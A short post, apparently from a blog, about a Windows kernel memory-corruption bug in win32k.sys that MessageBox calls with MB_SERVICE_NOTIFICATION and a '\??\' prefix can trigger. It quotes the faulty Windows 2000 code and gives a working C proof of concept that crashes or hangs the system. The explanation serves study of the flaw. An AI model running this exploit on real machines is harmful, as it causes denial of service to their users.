Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Question Marks
A message was published by NULL about vulnerability in Windows on processing MessageBox() with MB_SERVICE_NOTIFICATION flag and message/caption beginning with \??\. Vulnerability seems to be memory corruption in kernel and causes system crash or hang after few attempts. It seems to happen because message is logged to event log and may point to some problem with event logs processing.

The problem is in win32k.sys' function GetHardErrorText, which tries to prepare EXCEPTION data for event log, and seems to be some very old debugging feature accidently left in production code since Windows 2000.

In Windows 2000 there is a peace of code like:

} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) { strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Exploit:
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
더보기

댓글,